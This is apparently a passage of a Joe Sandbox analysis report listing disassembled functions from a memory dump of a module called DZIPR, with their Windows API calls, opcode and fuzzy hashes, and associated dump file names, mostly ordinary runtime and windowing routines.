                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2714421763-0
                                        • Opcode ID: 0533317e52f8e375d11cd7a77037f1ea99c7becdf5a7b8f526b03a3abde3481e
                                        • Instruction ID: f46a27691a460380231bb99d8780196ec94d766d71d42c9a9fe3c088a2ab86ab
                                        • Opcode Fuzzy Hash: 0533317e52f8e375d11cd7a77037f1ea99c7becdf5a7b8f526b03a3abde3481e
                                        • Instruction Fuzzy Hash: 0001D631805B16AAEF205F74EF0875E3FA4AF02729F70011EE510AA2D8CF38A640CB94
                                        APIs
                                        • TlsFree.KERNEL32(?,?,?,6FEAC179), ref: 6FEAC13B
                                        • GlobalHandle.KERNEL32(?), ref: 6FEAC149
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6FEAC152
                                        • GlobalFree.KERNEL32(00000000), ref: 6FEAC159
                                        • RtlDeleteCriticalSection.NTDLL ref: 6FEAC163
                                          • Part of subcall function 6FEABF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FEABFBC
                                          • Part of subcall function 6FEABF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABFCC
                                          • Part of subcall function 6FEABF5D: LocalFree.KERNEL32(?), ref: 6FEABFD5
                                          • Part of subcall function 6FEABF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FEABFE7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                        • String ID:
                                        • API String ID: 1549993015-0
                                        • Opcode ID: 0907fdb8ba640f1cb973a4d52004ad7aafa7c8776ceaa22b81af94c1bf17caa9
                                        • Instruction ID: 0e5e36bc4be87f191ebb9ebaa47870682a7d0ca604bdfb32cf64380112afebe5
                                        • Opcode Fuzzy Hash: 0907fdb8ba640f1cb973a4d52004ad7aafa7c8776ceaa22b81af94c1bf17caa9
                                        • Instruction Fuzzy Hash: 3BF09A36304A109BCA115B3C9D0CE5B3FB8AFC6A64326026AF425CB380CB31E81287A0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __calloc_crt
                                        • String ID: $o$ }o
                                        • API String ID: 3494438863-763987776
                                        • Opcode ID: a79d228613ee8ac161fdfdcdd076d46247d6a2c96be628d61749c00f5fc6f0de
                                        • Instruction ID: fbe25e8be62af33d86388ad1cd23e03e15174a295e47198fb30da3090b6dfe6f
                                        • Opcode Fuzzy Hash: a79d228613ee8ac161fdfdcdd076d46247d6a2c96be628d61749c00f5fc6f0de
                                        • Instruction Fuzzy Hash: EA11E336748A515BE71C8AADBE807513F99AF87738B34122FF510CE7C0E738E8824284
                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 6FEBC7D6
                                          • Part of subcall function 6FEBC731: ___BuildCatchObjectHelper.LIBCMT ref: 6FEBC767
                                        • _UnwindNestedFrames.LIBCMT ref: 6FEBC7ED
                                        • ___FrameUnwindToState.LIBCMT ref: 6FEBC7FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm
                                        • API String ID: 2163707966-1018135373
                                        • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction ID: eb0aa0b5b8e126f2fe0ea9b31bd53ff615ef53dd1a32ba7fe89fffe94240fe41
                                        • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction Fuzzy Hash: 6701FB7110521ABBDF125F65CE44EEA7F6AFF08358F204019FD1865160D732E571DBA1
                                        APIs
                                        • GetModuleHandleA.KERNEL32(KERNEL32,6FEB77D7), ref: 6FEBED7C
                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FEBED8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                        • API String ID: 1646373207-3105848591
                                        • Opcode ID: df0b6a0e8ce68557e958c2e45053ebbd5815c2ea06959a682612701fe9ed237e
                                        • Instruction ID: 2cf3345c58a10ca14dd3dc3fa705c454401c700478ec9985f3ff4d3f7e3c363a
                                        • Opcode Fuzzy Hash: df0b6a0e8ce68557e958c2e45053ebbd5815c2ea06959a682612701fe9ed237e
                                        • Instruction Fuzzy Hash: 2CF01D34A40E09D2DF001FB1AE196AF7E79BB82B56F9209D5E1A5A1184DE7090B1D346
                                        APIs
                                        • ___addlocaleref.LIBCMT ref: 6FEC054E
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(00000000), ref: 6FEC0426
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0433
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0440
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC044D
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC045A
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0476
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0486
                                          • Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC049C
                                        • ___removelocaleref.LIBCMT ref: 6FEC0559
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(00000000), ref: 6FEC04BD
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04CA
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04D7
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04E4
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04F1
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC050D
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC051D
                                          • Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC0533
                                        • ___freetlocinfo.LIBCMT ref: 6FEC056D
                                          • Part of subcall function 6FEC02CB: ___free_lconv_mon.LIBCMT ref: 6FEC0311
                                          • Part of subcall function 6FEC02CB: ___free_lconv_num.LIBCMT ref: 6FEC0332
                                          • Part of subcall function 6FEC02CB: ___free_lc_time.LIBCMT ref: 6FEC03B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                        • String ID: P)o
                                        • API String ID: 467427115-3185942622
                                        • Opcode ID: 15abfec1d302db2c2af96b2de4cdc7c349ecf40d34c120f803efaaf21b12e8d6
                                        • Instruction ID: 28c5d4476bff0da0ac0b1f4bf2ba8539385ab454190bc082f5a3cedf2211726e
                                        • Opcode Fuzzy Hash: 15abfec1d302db2c2af96b2de4cdc7c349ecf40d34c120f803efaaf21b12e8d6
                                        • Instruction Fuzzy Hash: D3E048F2915921478B37192C76102EA5E547FC1639B31215BF670E7294DB249AC26097
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$SizeTime_memset
                                        • String ID:
                                        • API String ID: 151880914-0
                                        • Opcode ID: a3156f1733fffb1aa1051a95cd520e226a8cd07261bd08d941878fe27a0dc701
                                        • Instruction ID: 94b4dd09c3d8180314740e4c046b921be34713f18ec54c744d7090193bbfc4bf
                                        • Opcode Fuzzy Hash: a3156f1733fffb1aa1051a95cd520e226a8cd07261bd08d941878fe27a0dc701
                                        • Instruction Fuzzy Hash: 0E510B715047059FDB20CF68C94499ABBF8FF09324B208A2EE5A6D7690E735F945CB60
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FEC084F
                                        • __isleadbyte_l.LIBCMT ref: 6FEC0883
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6FEB40D8,6FECBF84,00000000,00000000,?,?,?,?,6FEB40D8,00000000,?), ref: 6FEC08B4
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6FEB40D8,00000001,00000000,00000000,?,?,?,?,6FEB40D8,00000000,?), ref: 6FEC0922
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: b8a543402801726d24cb995d8bbf2137e8bfea4352ea9c3bc723b1dd3f83704d
                                        • Instruction ID: 99cb21e37ab667cf3d15fc71f63e9cca6161587dd742484bc4544a96bdca84e6
                                        • Opcode Fuzzy Hash: b8a543402801726d24cb995d8bbf2137e8bfea4352ea9c3bc723b1dd3f83704d
                                        • Instruction Fuzzy Hash: E131A672904245EFDB00CFA4CA94AAE7FB5EF01324F21956AF674DB291D330E941DB92
                                        APIs
                                        • GlobalLock.KERNEL32(?), ref: 6FEA88E7
                                        • lstrcmpW.KERNEL32(00000000,?), ref: 6FEA88F4
                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FEA892E
                                        • GlobalLock.KERNEL32(00000000), ref: 6FEA8938
                                          • Part of subcall function 6FEADAD1: GlobalFlags.KERNEL32(?), ref: 6FEADAE0
                                          • Part of subcall function 6FEADAD1: GlobalUnlock.KERNEL32(?), ref: 6FEADAF2
                                          • Part of subcall function 6FEADAD1: GlobalFree.KERNEL32(?), ref: 6FEADAFD
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                        • String ID:
                                        • API String ID: 2391069079-0
                                        • Opcode ID: 02e67ceb4d7c4911d041ac5592eb8b8b12b751ed214cbcb173c4aaca1019646e
                                        • Instruction ID: b98bc989cdd3cb5f445b3aedf4e9ba0c0d9e6dda6185f70f770e8bbd2aa6d854
                                        • Opcode Fuzzy Hash: 02e67ceb4d7c4911d041ac5592eb8b8b12b751ed214cbcb173c4aaca1019646e
                                        • Instruction Fuzzy Hash: 21118F71504A44BFCB125BA5CD48DAF7EBDFF85705720046AFA15DA160D732EA10D721
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 6FEABFBC
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABFCC
                                        • LocalFree.KERNEL32(?), ref: 6FEABFD5
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6FEABFE7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                        • String ID:
                                        • API String ID: 2949335588-0
                                        • Opcode ID: 5e4be5cbff95b6351345d3ea993585e82cdb9ea21409ae33efe85470fc75273d
                                        • Instruction ID: eb822f9751732d8720e5b11870c0786dd2ea8bca7cd62388f86acada60a26aff
                                        • Opcode Fuzzy Hash: 5e4be5cbff95b6351345d3ea993585e82cdb9ea21409ae33efe85470fc75273d
                                        • Instruction Fuzzy Hash: E5116A35A00608EFD714CF64C884F99BBA5FF46315F24846EF5628B6A1CB72B950CF10
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FEA8ED0
                                          • Part of subcall function 6FEA9C7C: __EH_prolog3.LIBCMT ref: 6FEA9C83
                                        • __wcsdup.LIBCMT ref: 6FEA8EF2
                                        • GetCurrentThread.KERNEL32 ref: 6FEA8F1F
                                        • GetCurrentThreadId.KERNEL32 ref: 6FEA8F28
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentH_prolog3Thread$__wcsdup
                                        • String ID:
                                        • API String ID: 190065205-0
                                        • Opcode ID: cc4c9a8ecd7c9a39de057aee63d04f02c068f57b25cca4f4aae9d8eb18de5828
                                        • Instruction ID: e158fcbe8ee396ef9163a825de10091862e0b670d6f30416912cf4b5cbb43be0
                                        • Opcode Fuzzy Hash: cc4c9a8ecd7c9a39de057aee63d04f02c068f57b25cca4f4aae9d8eb18de5828
                                        • Instruction Fuzzy Hash: BA217BB0904B448EC7219F7A864164AFEE4BFA4704B20891FD1AA8BB65DBB1A140CF45
                                        APIs
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FEB1D33
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FEB1D5E
                                        • GetCapture.USER32 ref: 6FEB1D70
                                        • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FEB1D7F
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MessageSend$Capture
                                        • String ID:
                                        • API String ID: 1665607226-0
                                        • Opcode ID: 35245ded69cd55f8ad29aca6a200fc5a6a9dceff6068bc286bccf85824332b1c
                                        • Instruction ID: 457aee7aa6870c0ad9ad4205468b11b4342a8fe76ddcf2e4364962baa9825549
                                        • Opcode Fuzzy Hash: 35245ded69cd55f8ad29aca6a200fc5a6a9dceff6068bc286bccf85824332b1c
                                        • Instruction Fuzzy Hash: D00152313402947BDE215BA68DCCFDB3E79DBCAB21F21007CB6049A1E6CAA19800D620
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FEA6A8A
                                          • Part of subcall function 6FEA68E2: _malloc.LIBCMT ref: 6FEA6900
                                        • __CxxThrowException@8.LIBCMT ref: 6FEA6AC0
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FEA16A6,00000000,00000000,?,?,6FECD898,00000004,6FEA16A6,00000000,6FEA69F9,00000000), ref: 6FEA6AEA
                                        • LocalFree.KERNEL32(6FEA16A6,6FEA16A6,00000000,6FEA69F9,00000000), ref: 6FEA6B12
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                        • String ID:
                                        • API String ID: 1776251131-0
                                        • Opcode ID: d9a1fb157581bd1454e1c87e87758f56e574873b5b81f6880f1ad44adae5154a
                                        • Instruction ID: 25905ce5fbb5455aad0908f364f9bdfcb319c60dfaa2e25565f03d9401240005
                                        • Opcode Fuzzy Hash: d9a1fb157581bd1454e1c87e87758f56e574873b5b81f6880f1ad44adae5154a
                                        • Instruction Fuzzy Hash: C1111C75604349AFDF049F68CD44AAA3FA5EF8A314F30C529F5298E2E0E7329A509B50
                                        APIs
                                        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FEAD194
                                        • RegCloseKey.ADVAPI32(00000000), ref: 6FEAD19D
                                        • swprintf.LIBCMT ref: 6FEAD1BA
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FEAD1CB
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ClosePrivateProfileStringValueWriteswprintf
                                        • String ID:
                                        • API String ID: 22681860-0
                                        • Opcode ID: 897d1a7c87fd42209165552f2213dfdcecaf23ac2c47b64514342e45175f6433
                                        • Instruction ID: 7a3ec913a17882fbab53544fa7ddb072df9e2e784bd7688b86632c5889a3815d
                                        • Opcode Fuzzy Hash: 897d1a7c87fd42209165552f2213dfdcecaf23ac2c47b64514342e45175f6433
                                        • Instruction Fuzzy Hash: B401A176500309AFDB119B648D45FAF7BADAF4A718F21042AF910A7180DB75ED1587A0
                                        APIs
                                          • Part of subcall function 6FEA68E2: _malloc.LIBCMT ref: 6FEA6900
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FEA72BB
                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FEA72C1
                                        • DuplicateHandle.KERNEL32(00000000), ref: 6FEA72C4
                                        • GetLastError.KERNEL32(?), ref: 6FEA72DF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                        • String ID:
                                        • API String ID: 3704204646-0
                                        • Opcode ID: 0a509d37403e1b37d95d4fca680826ae95a0e104b298d73167faf8081e872fdc
                                        • Instruction ID: 18f7dc3b534e1eade1d24f541ae9554fd21b32d7a92c1b789d0a84c150ca8ad3
                                        • Opcode Fuzzy Hash: 0a509d37403e1b37d95d4fca680826ae95a0e104b298d73167faf8081e872fdc
                                        • Instruction Fuzzy Hash: 50015E71600605ABDB009BAACD89F5A7EA9EFC5764F244465F515CF288DB72EC008760
                                        APIs
                                        • GetTopWindow.USER32(?), ref: 6FEB0F9D
                                        • GetTopWindow.USER32(00000000), ref: 6FEB0FDC
                                        • GetWindow.USER32(00000000,00000002), ref: 6FEB0FFA
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window
                                        • String ID:
                                        • API String ID: 2353593579-0
                                        • Opcode ID: dbe6cf6573534a772fd2a6544410fd00824ce4ce90786be88f2fa047153d27b7
                                        • Instruction ID: 44f2f61429ff17e09b401948ad5a650f76ea6a922808749da18200db2aef0bfd
                                        • Opcode Fuzzy Hash: dbe6cf6573534a772fd2a6544410fd00824ce4ce90786be88f2fa047153d27b7
                                        • Instruction Fuzzy Hash: 5701803210961ABBCF025F948F08EDF3F26AF49366F105129FB2060160C736E532EBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction ID: 88fba0569a9a7501f8aa6e550f16fea11be2cc6480daca6b645a6f18e03370ff
                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction Fuzzy Hash: BB118372400A8EBBCF125F94DE45CDD3F62BB08358B248499FA2858170C732D6B1AF82
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 6FEB03DC
                                        • GetTopWindow.USER32(00000000), ref: 6FEB03EF
                                          • Part of subcall function 6FEB03CF: GetWindow.USER32(00000000,00000002), ref: 6FEB0436
                                        • GetTopWindow.USER32(?), ref: 6FEB041F
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
